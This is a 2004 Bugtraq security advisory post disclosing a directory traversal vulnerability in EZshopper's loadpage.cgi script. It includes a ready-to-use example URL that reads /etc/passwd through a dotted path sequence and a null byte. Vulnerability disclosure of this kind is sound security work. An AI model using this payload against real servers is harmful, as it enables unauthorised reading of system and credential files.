[37510] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

EZshopper is still vulnerable against Directory Traversal.

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Thu Nov 25 14:53:14 2004

Date: 25 Nov 2004 15:33:22 -0000
Message-ID: <20041125153322.5934.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com



Product: EZshopper
Versions: all
URL: www.ahg.com
Vulnerability: Directory Traversal
Date: November 25, 2004
Discovered by: Zero X <Zero_X@excluded.org>


loadpage.cgi of EZshopper allows Directory Traversal


Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html


- Zero X
- http://www.excluded.org

home	help	back	first	fref	pref	prev	next	nref	lref	last	post